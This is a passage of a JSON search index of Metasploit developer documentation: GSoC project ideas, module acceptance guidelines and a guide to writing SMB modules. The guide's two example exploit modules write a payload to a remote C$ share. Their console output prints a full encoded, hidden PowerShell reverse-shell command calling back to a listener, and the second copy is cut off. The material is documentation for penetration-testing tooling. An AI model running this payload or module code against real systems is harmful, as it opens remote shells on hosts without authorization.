‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Size: Medium/Large (Depends on proposal) Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Size: Large Difficulty: 4/5 . Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed. | See Metasploit ‘Goliath’ Demo (msf-red) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath) | ./Metasploit-Data-Service-Enhancements-Goliath] | . Size: Medium/Large (Depends on proposal) Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#enhance-metasploit-framework"
  },"175": {
    "doc": "2022 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on Slack in the #gsoc channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#submit-your-own"
  },"176": {
    "doc": "2022 Project Ideas",
    "title": "2022 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @zerosteiner, @jmartin-r7, @gwillcox-r7 . Slack Contacts: @zeroSteiner, @Op3n4M3, @gwillcox-r7 on Metasploit Slack . For any questions about these projects reach out on the Metasploit Slack in the #gsoc channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don’t expect an immediate response, however we will endeavor to respond as soon as possible. If you’d prefer not to join Slack, you can also email msfdev [@] metasploit [dot] com and we will respond to your questions there if email is preferable. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html"
  },"177": {
    "doc": "2023 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Rest API Pagination . Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a limited set of RCP commands however review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility of the existing public RPC service or generate a one time migration across all exposed public APIs. Size: Large Difficulty: 4/5 . LDAP Capture Capabilities . Metasploit’s LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the 2021 Log4Shell vulnerability. Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are SPNEGO and StartTLS support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients. Size: Medium Difficulty: 3/5 . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Size: Medium/Large (Depends on proposal) Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Size: Large Difficulty: 4/5 . Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed. See Metasploit ‘Goliath’ Demo (msf-red) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at Metasploit-Data-Service-Enhancements-(Goliath) . Size: Medium/Large (Depends on proposal) Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#enhance-metasploit-framework"
  },"178": {
    "doc": "2023 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on Slack in the #gsoc channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#submit-your-own"
  },"179": {
    "doc": "2023 Project Ideas",
    "title": "2023 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @jmartin-r7 . Slack Contacts: @Op3n4M3 on Metasploit Slack . For any questions about these projects reach out on the Metasploit Slack in the #gsoc channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don’t expect an immediate response, however we will endeavor to respond as soon as possible. If you’d prefer not to join Slack, you can also email msfdev [@] metasploit [dot] com and we will respond to your questions there if email is preferable. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html"
  },"180": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Acceptance Guidelines",
    "content": "Contributions from the open source community are the soul of Metasploit, and we love evaluating and landing pull requests that add new Framework features and content. Metasploit Framework has many tens of thousands of users who rely on daily, consistent, and error-free updates. Because of this, Metasploit’s core developers have adopted a fairly high standard for pull requests that add new Framework functionality and Metasploit modules. In order to encourage open and transparent development, this document outlines some general guidelines for Metasploit contributors and developers. Adhering to these guidelines maximizes the chances that your work will be merged into the official Metasploit distribution packages. ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#acceptance-guidelines",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#acceptance-guidelines"
  },"181": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Module Additions",
    "content": "Most open source community support for Metasploit comes in the form of Metasploit modules. The following should be considered for acceptance; note that these are guidelines and not categorical imperatives (“should”s, not “must”s), since there are always exceptions to the norm-especially when it comes to novel new attacks and techniques. Modules should pass msftidy.rb and adhere to the CONTRIBUTING.md guidelines. Both are distributed with Metasploit. See Style Tips for some information on how to take some of the headache out of whitespace issues. Modules should have a clear and obvious goal: Exploits should result in a shell. Post modules should result in privilege escalation or loot. Auxiliary modules are an “Everything else” category, but even they should be limited to a well-defined task (e.g., information gathering to enable an exploit or a post module). Modules should not launch other modules, given the complexity of setting multiple payloads. Such actions are usually automation tasks for an external UI. Denial of Service modules should be asymmetric and at least have some interesting feature. If it’s comparable to a synflood, it shouldn’t be included. If it’s comparable to Baliwicked, it should be included. Modules that hover the line, such as slowloris, may be included with some justification. Modules should be able to function as expected with minimal configuration. Defaults should be sensible and usually correct. Modules should not depend on exact timing, uncontrollable heap states, system DLLs, etc. All memory addresses (ie. a JMP ESP, or a ROP gadget) should be part of the metadata under ‘Targets’, and documented (what instructions it points to, and what DLL). If the exploit is against a specific hardware (e.g., routers, PLCs, etc), or against a software that’s not free (and no trial/demo available), please remember to submit a binary packet capture (pcap-formatted) along with the module that demonstrates the exploit actually works. Please don’t use the alphanum encoder as a way to avoid BadChar analysis. Modules which set the EncoderType field in the payload as a way to avoid doing real BadChar analysis will be rejected. These modules are nearly always unreliable in the real world. Exploit ranking definitions can be found on the Exploit Ranking page. Exploit modules should implement a check() function when this is trivial to do so. Versions exposed through banners or network protocols should always result in a check() routine when a patch is available that changes this version. If a module (auxiliary or post) obtains some sort of information from the victim machine, it should store that data using one (or more) of the following methods: . | store_loot(): Used to store both stolen files (both text and binary) and “screencaps” of commands such as a ps -ef and ifconfig. The file itself need not be of forensic-level integrity – they may be parsed by a post module to extract only the relevant information for a penetration tester. | report_auth_info(): Used to store working credentials that are immediately reusable by another module. For example, a module dumping the local SMB hashes would use this, as would a module which reads username:password combinations for a specific host and service. Specifically, merely “likely” usernames and passwords should use store_loot() instead. | report_vuln(): Auxiliary and post modules that exercise a particular vulnerability should report_vuln() upon success. Note that exploit modules automatically report_vuln() as part of opening a session (there is no need to call it especially). | report_note(): Modules should make an effort to avoid report_note() when one of the above methods would be a better fit, but there are often cases where “loot” or “cred” or “vuln” classifications are not immediately appropriate. report_note() calls should always set a OID-style dotted :type, such as domain.hosts, so other modules may easily find them in the database. | . Modules should take advantage of the normal Metasploit APIs. For example, they should not attempt to create their own TCP sockets or application protocols with native Ruby; they should mediate sockets through Rex and Rex::Proto methods instead. This ensures compatibility with the full set of Framework features, such as pivoting and proxy chaining. Web application attacks are generally uninteresting (SQLi, XSS, CSRF), unless the module can reliably result in a shell or exercise some kind of useful information leak. Even in that case, the module should “just work,” as above. Web application attacks should be limited only to popular, widely deployed applications. For example, a SQLi module against a popular CMS that results in a shell on the CMS machine would be welcome. A module that causes a private Facebook profile to become public would not (Facebook has exactly one deployed instance). Web application attacks should implement an HttpFingerprint constant. Modules should only list targets that you actually tested the exploit on. Avoid assuming it works on a specific system if it has never been tested on it. Comments above the target entry indicating additional information about a given target (language pack, patch level, etc) greatly assist other developers in creating additional targets and improving your module. Modules can exercise unpatched and undisclosed vulnerabilities. However, Rapid7 is happy to assist with the disclosure process by following the Rapid7 policy. This policy provides a fixed 90-day window from when the vendor is contacted until the exploit is released. All vulnerabilities found by Rapid7 staff follow this process. The submitter will receive full credit for the vulnerability and the resulting exploit module regardless of how disclosure is handled. ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions"
  },"182": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Framework Enhancements",
    "content": "Generally, new functionality to the Metasploit Framework should start life as a plugin. If the functionality becomes useful and popular, we can integrate it more closely, add RPC API exposure, and so on, but it should be well-tested by the community before then. Automating a series of discrete functions is generally /not/ the responsibility of the Framework. Automation should be accomplished through the API (see Metasploit Community/Pro, MSFGUI, etc). Past efforts with in-Framework automation prove this out. Components such as db_autopwn and browser_autopwn rarely did what users expected, and configuring these tools became a nightmare through increasingly complex sets of options and arguments. Automating the Framework is easy and should stay easy, but the automation itself should live in resource scripts and other external front-ends to the Framework itself. Console functionality should have a focus on exploit and security tool development, with the exploit developer as the typical user. End users should be pointed to an interface such as the Community Edition or MSFGUI and should not expect much in terms of user-friendliness from the console. The console should be considered a debug mode for Metasploit and as close to bare-metal functionality as possible. External tools, such msfpayload and msfvenom, are designed to make exploit development easier and exercise specific techniques. We are happy to continue evaluating tools of this nature for inclusion in the Framework; these should be accompanied by documentation (!), how-to tutorials for quick start, and other helpful text. ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#framework-enhancements",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#framework-enhancements"
  },"183": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Guidelines for Accepting Modules and Enhancements",
    "content": " ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html"
  },"184": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "SMB Protocol Overview",
    "content": "SMB (Server Message Block) is a network communication protocol that provides file sharing, network browsing, printing services, and interprocess communication over a network. It relies on lower level protocol transports: . | NetBIOS . | over TCP/IP (NBT) on 137/UDP, 138/UDP, 137/TCP and 139/TCP | over NetBEUI | . | Directly over TCP on 445/TCP (by far the most commonly used) | . CIFS is a particular implementation of SMB created by Microsoft based on the original IBM specifications. It has been replaced by SMB v1.0, which is a Microsoft Extensions to MS-CIFS. SMB2 is a complete rewrite of the protocol which primarily aims to reduce the amount of messages exchanged between the client and the server. SMB v2.0 has been introduced in Windows Vista/Server 2008. It also brings some new features such as: . | Pipelining | Symbolic links | Large file transfers improvement | Better signing | New opportunistic locking mechanism | . SMB v2.1 was added to Windows 7/Server 2008 R2 with a few improvements: . | Minor performance enhancements | New opportunistic locking mechanism | . SMB3 adds some interesting features and has been introduced in Windows 8/Server 2012. Here are some new capabilities added by the SMB v3.0 dialect: . | SMB Direct (SMB over remote direct memory access - RDMA) | SMB Multichannel (multiple connections per SMB session) | SMB Transparent Failover (useful for clustered file server) | Per-share encryption (AES-128 CCM) and AES-based signing | . SMB v3.0.2 (from Windows 8.1/Server 2012 R2) only adds some small improvements. Finally, SMB v3.1.1 (from Windows 10/Server 2016) introduces the following features: . | Negotiation of encryption and integrity algorithms | AES-128 GCM encryption | Pre-authentication integrity check (SHA-512) | Compression | . ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#smb-protocol-overview",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#smb-protocol-overview"
  },"185": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Common SMB Packet Exchange Scenarios",
    "content": ". | NetBIOS session establishment This step is only required if NetBIOS over TCP (NBT) transport is used. This is not very common anymore, since SMB over TCP (from windows 2000) removed the NetBIOS transport layer. In case a NetBIOS session needs to be established, this must be the first packet exchange. | Negotiation This is where the SMB protocol version and dialect are going to be negotiated between the client and the server. From SMB v3.1.1, encryption/compression capabilities are also negotiated at the same time. | Authentication Depending on the authentication scheme, this step requires one or two packet exchanges. NTLM challenge-response, the only authentication protocol supported by RubySMB at time of writing, consists of sending first a Session Setup packet containing the client capabilities. The server responds with a challenge. Then, another Session Setup request is sent with the challenge response. If it is accepted, the server returns a Session ID that will be used in subsequent requests. This defines the beginning of an SMB Session. | . Fig.1 - Negotiation &amp;amp; authentication packet exchanges . | Connect to a share Once the SMB session is established, the SMB client must connect to a remote share.This is done by sending a TreeConnect request and getting a Tree ID. This identifier will be used by subsequent file operations on this share. | File operation From there, the client can execute any file operation on the remote share, such as open, read, write, delete, rename, etc. When the client is done with a file, it can simply close the handle. The Tree ID remains valid and can be reused. | . Fig.2 - Connect to share &amp;amp; read file packet exchanges . | Close tree and session The client can decide to release the connection to the share at any time by sending a TreeDisconnect request. Note that the SMB session will remain active until the client sends a Logoff packet, which defines the end of the SMB Session. | . ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#common-smb-packet-exchange-scenarios",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#common-smb-packet-exchange-scenarios"
  },"186": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Module Writing",
    "content": "Using the default MSF client . The following mixin will bring everything you need, including the main MSF SMB Client. include Msf::Exploit::Remote::SMB::Client::Authenticated . Following the same workflow described above: . | Initialization | . The first step is to initialize the client by invoking connect. The version(s) that will be negotiated can also be set up by passing an array to the keyword arguments versions. For example, to negotiate any dialect of SMB version 2 and 3, use this: . connect(versions: [2, 3]) . The default is to negotiate versions 1, 2 and 3. Note that the client will just let the SMB server know which versions and dialects it supports. The server will always choose the latest version it supports. This means, Windows 7 will always choose SMB v2.1 (SMB3 has been added to Windows 8 only), even if versions 1, 2 and 3 are advertised by the client. If SMB2 is disabled on this host for whatever reason, the SMB server will fall back to SMB1. By choosing which versions the client must negotiate, you can force the server to use a specific protocol version, assuming it is supported and enabled. From Metasploit 6, the MSF client uses RubySMB under the hood by default for any SMB protocol version. For compatibility with older modules, it is still possible to force the client to use the original Rex SMB implementation. Note that this is not recommended and RubySMB should be the default for new modules. This can be done by explicitly negotiate SMB1 only (Rex only supports this version): . connect(versions: [1]) . | NetBIOS session, negotiation and authentication | . The actual negotiation and authentication are handled by smb_login. This retrieves the NetBIOS name, user name, password and domain from the SMBName, SMBUser, SMBPass and SMBDomain options set by the operator, respectively. Other options can be set and are defined in MSF SMB client. Under the hood, smb_login establishes the NetBIOS session (if needed), negotiates the protocol version/dialect and sets the SMB Session up using NTLM challenge-response authentication protocol. If, for whatever reason, the authentication options cannot be retrieved from the user options, it is still possible to provide them manually by calling simple.login() directly (see SimpleClient#login) . simple.login(name, user, pass) . Note that simple is the Rex::Proto::SMB::SimpleClient object and is accessible anywhere in the module. This is the main interface to interact with RubySMB (more on that later). | Connect to a share | . This is done by invoking simple.connect: . simple.connect(\"\\\\\\\\&amp;lt;host&amp;gt;\\\\&amp;lt;share&amp;gt;\") . | File operations | . | read a file file_path = 'file/path/relative/to/the/share/root' file = smb_open(file_path, 'o') print_status(\"File content: #{file.read}\") file.close . See SimpleClient#open and RubySMB::Dispositions for details about the smb_open mode argument. | write to a file file = smb_open(file_path, 'co', write: true) file &amp;lt;&amp;lt; \"my file data\" file.close . | delete a file simple.delete(file_path) . | . | Close the connection to the remote share | . simple.disconnect(\"\\\\\\\\&amp;lt;host&amp;gt;\\\\&amp;lt;share&amp;gt;\") . Since Metasploit 6, two new options were introduced to control version negotiation and encryption. These options are only available when using the default MSF SMB client and are automatically pulled in with Msf::Exploit::Remote::SMB::Client or Msf::Exploit::Remote::SMB::Client::Authenticated mixins: . | SMB::ProtocolVersion: one or a list of comma-separated SMB protocol versions to negotiate (e.g. “1” or “1,2” or “2,3,1”). | SMB::AlwaysEncrypt: enforces encryption even if the server does not require it (SMB3.x only). When it is set to false, the SMB client will still encrypt the communication if the server requires it. | . Using RubySMB client directly . This mixin is not required but can be useful to expose the SMB related options to the operator: . include Msf::Exploit::Remote::SMB::Client::Authenticated . An alternative is to register the options we need in initialize: . register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), OptString.new('SMBPass', [ false, 'The password for the specified username', '']), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', '.']), ]) . Following the same workflow described above: . | Initialization | . | setup the dispatcher dispatcher = RubySMB::Dispatcher::Socket.new(sock) . | initialize the client SMB versions 1, 2 and 3 will be negotiated by default. Use smb1, smb2 and smb3 keyword arguments to disable a version (false value). See RubySMB::Client#initialize for more initialization options client = RubySMB::Client.new(dispatcher, username: datastore['SMBUser'], password: datastore['SMBPass'], domain: datastore['SMBDomain']) . | . | Negotiation | . client.negotiate . | Authentication | . client.authenticate . | Connect to a share | . tree = client.tree_connect(\\\\\\\\&amp;lt;host&amp;gt;\\\\&amp;lt;share&amp;gt;) . | File operations | . file_path = 'file/path/relative/to/the/share/root' . | read a file (see RubySMB::SMB1::Tree and RubySMB::SMB2::Tree for details) file = tree.open_file(filename: file_path) data = file.read file.close . | write to a file file = tree.open_file(filename: file_path, write: true, disposition: RubySMB::Dispositions::FILE_OPEN_IF) file.write(data: 'my data') file.close . | delete a file file = tree.open_file(filename: file_path, delete: true) file.delete file.close . | . | Close the connection to the remote share | . tree.disconnect! . | Close the SMB session | . client.disconnect! . ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#module-writing",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#module-writing"
  },"187": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Examples",
    "content": "Using the default MSF client . modules/exploits/windows/smb/msf_smb_client_test.rb . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'MSF SMB Client Test', 'Description' =&amp;gt; %q( This module simply write, read and delete a file on the remote host using default MSF SMB client. ), 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Christophe De La Fuente' ], 'Platform' =&amp;gt; 'windows', 'Arch' =&amp;gt; ARCH_CMD, 'Targets' =&amp;gt; [[ 'Windows', {} ]], 'DefaultOptions' =&amp;gt; { 'PAYLOAD' =&amp;gt; 'cmd/windows/powershell_reverse_tcp' } ) ) end def exploit connect smb_login share = \"\\\\\\\\#{rhost}\\\\C$\" simple.connect(share) file_path = 'Windows\\\\Temp\\\\payload.bat' print_status(\"Create and write to #{file_path} on #{share} remote share\") file = smb_open(file_path, 'co', write: true) file &amp;lt;&amp;lt; payload.encode file.close print_status(\"Read #{file_path} on #{share} remote share\") file = smb_open(file_path, 'o') print_status(\"File content: #{file.read}\") file.close print_status(\"Delete #{file_path} on #{share} remote share\") simple.delete(file_path) ensure simple.disconnect(share) if simple end end . msfconsole output: . msf6 exploit(windows/smb/msf_smb_client_test) &amp;gt; options Module options (exploit/windows/smb/msf_smb_client_test): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.60.128 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass ABCDEFG no The password for the specified username SMBUser smbuser no The username to authenticate as Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.60.1 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf6 exploit(windows/smb/msf_smb_client_test) &amp;gt; run [*] Started reverse SSL handler on 172.16.60.1:4444 [*] 172.16.60.128:445 - Create and write to Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - Read Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - File content: powershell.exe -nop -w hidden -noni -ep bypass \"&amp;amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAFzTKl8CA51WXW/bNhR996+48LRaQizCNroOCJBirpJuAbLWqLzlwTAQmrqOtcikR1L+QOL/XlKiLDlO0GV6sUVennvuuR/UTzASG5TznEMItzLVGjnMdvDJ/IxzyVHCO7ika4Q/qEx2rZaxZDoVHH5HHd7ijGUpcg2txxaYx9swuIAvuAm/zv5BpiEc71b4hS7RLGpi7KPCvjImfym8xDnNMx1JTMxOSjNlIDwtczxYjaTY7sgzC7PeWKlsW/ua4qoKrfUIxf6ISrr0y/+TWMuU30+9SCyXlCfd49VYZUzwZ4uXYsMzQZNiNXCYUjBUCpwAS5HkGVqCv/kBlCbpHPzKDYT4L7RnKU/aQbFZnivOZqky8hvJL4zLnfm/JFa1WLAH1IqM2erGWUzfm+f0IFGaSm39Os/FrkvRRcNuyBiutAEs0+GXVPav0ZW4RqnwlPEBupHyl5hHI+eo3f91QPofyIce6be7NgrnulXKp7REurRcS2hiyiwu1gzHml2ZnZKcrZS2S0aDmlJZXIG9wg5Zbip+R+LK1Hf+u97clBR2/UdvbND3EFIFk6Mz33ApNEYodTpPGdX4N83ShNq6i2iWzSh7mAbBC3TIMNcLW7T20FC9pEvQSF4tSB1QU7HJbKdxMp169teWXY+QQc88Tz8/9vZOVORJte1PNG41Qc5EYmv6/HwYR9fXgRX6k7Xx27emOMVGlZMhXmCWgcw5N9ZgZMiVKdA2nIGHfH1u37ht7zOzZjJy2GBiucp1vXnHI7HayfR+ocGPAhj0+r/AnymTQom5hkjIlZCFfASG1qO1VCDROFhjQu74HXf15zQhdlyhX0fX7XXrF3KD/F4vmkVTdW+zbE6q5m1STc6mcGMgrTau88mB59u5Vqc+C3lF2cJwLkEh5YfJUlvVtO3jHw3kgFTRlrOrQgqervlaPGB4tV0ZbZXR+4CyP+7ENynRGcXQMXkuWNwIVmQyICOqF2a187Hzv1O3WaQZ+r6XFj1QHv+GNPHLiu9Crwve0bkAQo7QO8ntlaWPydiE8tol5aaDNSFFiFcu5BrF9Di1VBpobkgVMlfhgJcGz8rKjASr5UkCIKyGbQk++PiuD0/wNddhiQpOiiOoARSCVMBG5B+kADo1yNYS8VBKISe96ZGzButin7AMqfSDlxhcNF9M429bp530n8qnhvlh6zRL5aRxqjOfs1wtDvevG4PuRokyodDFU9+IsRar6ho03xCtw7fDITnuEoTQXT52gHwHT7D+aT8JAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\" [*] 172.16.60.128:445 - Delete Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] Exploit completed, but no session was created. Using RubySMB client directly . modules/exploits/windows/smb/ruby_smb_client_test.rb . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'RubySMB Client Test', 'Description' =&amp;gt; %q( This module simply write, read and delete a file on the remote host using default RubySMB client. ), 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Christophe De La Fuente' ], 'Platform' =&amp;gt; 'windows', 'Arch' =&amp;gt; ARCH_CMD, 'Targets' =&amp;gt; [[ 'Windows', {} ]], 'DefaultOptions' =&amp;gt; { 'PAYLOAD' =&amp;gt; 'cmd/windows/powershell_reverse_tcp' } ) ) register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), OptString.new('SMBPass', [ false, 'The password for the specified username', '']), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', '.']), ]) end def exploit sock = connect dispatcher = RubySMB::Dispatcher::Socket.new(sock) client = RubySMB::Client.new(dispatcher, username: datastore['SMBUser'], password: datastore['SMBPass'], domain: datastore['SMBDomain'], always_encrypt: false) client.negotiate client.authenticate share = \"\\\\\\\\#{rhost}\\\\C$\" tree = client.tree_connect(share) file_path = 'Windows\\\\Temp\\\\payload.bat' print_status(\"Create and write to #{file_path} on #{share} remote share\") file = tree.open_file(filename: file_path, write: true, disposition: RubySMB::Dispositions::FILE_OPEN_IF) file.write(data: payload.encode) file.close print_status(\"Read #{file_path} on #{share} remote share\") file = tree.open_file(filename: file_path) print_status(\"File content: #{file.read}\") file.close print_status(\"Delete #{file_path} on #{share} remote share\") file = tree.open_file(filename: file_path, delete: true) file.delete file.close ensure tree.disconnect! if tree client.disconnect! if client end end . msfconsole output: . msf6 exploit(windows/smb/ruby_smb_client_test) &amp;gt; options Module options (exploit/windows/smb/ruby_smb_client_test): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.60.128 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 445 yes The target port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass ABCDEFG no The password for the specified username SMBUser smbuser no The username to authenticate as Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.60.1 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf6 exploit(windows/smb/ruby_smb_client_test) &amp;gt; run [*] Started reverse SSL handler on 172.16.60.1:4444 [*] 172.16.60.128:445 - Create and write to Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - Read Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - File content: powershell.exe -nop -w hidden -noni -ep bypass \"&amp;amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 